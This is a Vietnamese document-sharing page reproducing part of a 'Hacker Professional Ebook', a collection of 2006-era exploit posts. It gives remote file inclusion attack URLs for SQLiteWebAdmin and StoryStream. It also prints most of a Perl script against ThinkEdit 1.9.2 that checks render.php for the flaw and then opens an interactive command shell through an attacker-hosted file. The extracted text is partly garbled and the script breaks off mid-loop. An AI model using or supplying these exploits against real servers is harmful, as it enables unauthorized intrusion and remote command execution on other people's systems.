1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 432 ppt

5 58 0
Tài liệu đã được kiểm tra trùng lặp

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Tiêu đề Hacker Professional Ebook Part 432 Ppt
Tác giả Navaro(HCE), vns3curity(HCE), Black_hat_cr(HCE), r0ut3r
Trường học Unknown
Chuyên ngành Computer Science
Thể loại Essay
Năm xuất bản 2025
Thành phố Unknown
Định dạng
Số trang 5
Dung lượng 31,32 KB

Các công cụ chuyển đổi và chỉnh sửa cho tài liệu này

Nội dung

It suffers of a Remote File Inclusion Vulnerability.. The bug is in the "tpl.inc.php" program in the "lib" directory, and is exploited when passing the parameter "conf[classpath]".. http

Trang 1

################################################## ####

# DeluxeBB Remote SQL Injection Exploit #

# vbulletin Remote SQL Injection Exploit #

################################################## ####

Navaro(HCE)

SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability

Code:

SQLiteWebAdmin

http://sourceforge.net/projects/sqlitewebadmin

SQLiteWebAdmin is a simple PHP program for administrating

a SQL DataBase

It suffers of a Remote File Inclusion Vulnerability

The bug is in the "tpl.inc.php" program in the "lib"

directory, and is exploited when passing the parameter

"conf[classpath]"

http://www.server.com/lib/tpl.inc.php?conf[classpath]=[URL-OF-SCRIPT]

Succesfull explotation, needs register_globals=on

Att

SirDarckCat

elhacker.net

# milw0rm.com [2006-08-07]

vns3curity(HCE)

Trang 2

StoryStream 4.0 (baseDir) Remote File Include Vulnerabilities

# Information:- #

# #

# Scripts: Storystream #

# download : http://www.iwonderdesigns.com/downlo ta_0.4.0.0.zip #

# Version : 4 #

# Dork & vuln : download script and think #

# #

#=================================================

======================================#

# Exploit : #

# #

#http://localhost/path/include/classe /EvElCoDe.txt? #

#http://localhost/path/include/classe /EvElCoDe.txt? #

Black_hat_cr(HCE)

ThinkEdit 1.9.2 (render.php) Remote File Inclusion Vulnerability

Code:

##################################################################

###############################

# r0ut3r Presents #

# #

# Another r0ut3r discovery! #

# writ3r [at] gmail.com #

# #

# ThinkEdit Remote File Inclusion Exploit #

################################################################## ############################### # Software: ThinkEdit 1.9.2 #

# #

# Vendor: http://www.thinkedit.org/ #

Trang 3

# #

# Released: 2006/12/08 #

# #

# Discovered & Exploit By: r0ut3r (writ3r [at] gmail.com)

# # #

# Note: The information provided in this document is for ThinkEdit administrator

# # testing purposes only! #

# #

# Solution: #

# Add the below code to the top of render.php #

# if(basename( FILE ) == basename($_SERVER['PHP_SELF']))

# # die(); #

# #

# Exploit: #

# perl think.pl http://localhost /think/ http://localhost/cmd.txt cmd

# # #

# design/thinkedit/render.php?template_file= #

################################################################## ############################### ################################################################## ########## # Remote File Inclusion Exploiter #

# #

# This script attempts to exploit a remote file include vulnerability #

# by inserting a web shell into an include statement A shell is then #

# spawned #

# #

# Created By r0ut3r (writ3r [at] gmail.com) #

##################################################################

##########

use IO::Socket;

$port = "80"; # connection port

Trang 4

$target = @ARGV[0]; # localhost

$folder = @ARGV[1]; # /think/

$shellloc = @ARGV[2]; # http://localhost/cmd.txt

$cmdv = @ARGV[3]; # cmd

$vulnerable = false;

$s = true;

sub Header()

{

print q {Remote File Inclusion Exploiter - By r0ut3r (writ3r [at]

gmail.com)

-

};

}

sub Usage()

{

print q

{

Usage: think.pl [target] [directory] [shell_loc] [cmd_variable]

perl think.pl http://localhost /think/ http://localhost/cmd.txt cmd

};

exit();

}

Header();

if (!$target || !$folder || !$shellloc || !$cmdv) {

Usage(); }

if ($s eq false) { print "[-] Shell not found\n"; exit(); }

# Check if the script is vulnerable and register_globals are on (if needed)

$vulnc = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort

=> $port) || die "[-] Failed to connect on exploit attempt Exiting \r\n";

print $vulnc "GET

".$folder."render.php?template_file=AAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAA HTTP/1.1\n";

print $vulnc "Host: $target\n";

Trang 5

print $vulnc "User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html)\n"; print $vulnc "Accept: text/html\n";

print $vulnc "Connection: keep-alive\n\n";

while (<$vulnc>) {

if (/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/) {

$vulnerable = true; }

}

if ($vulnerable eq false) { print "[-] Target not vulnerable, or register_globals could

be off\n"; exit(); }

print "[+] Starting shell\n";

print "[cmd]\$ ";

$cmd = <STDIN>;

$cmd =~ s/ /%20/g;

while ($cmd !~ "exit")

{

$xpack = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $target, PeerPort => $port) || die "[-] Failed to connect on exploit attempt Exiting \r\n";

print $xpack "GET

".$folder."render.php?template_file=".$shellloc."&".$cmdv."=".substr($cmd, 0, -1)." HTTP/1.1\n";

print $xpack "Host: $target\n";

print $xpack "User-Agent: Googlebot/2.1

(+http://www.google.com/bot.html)\n";

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN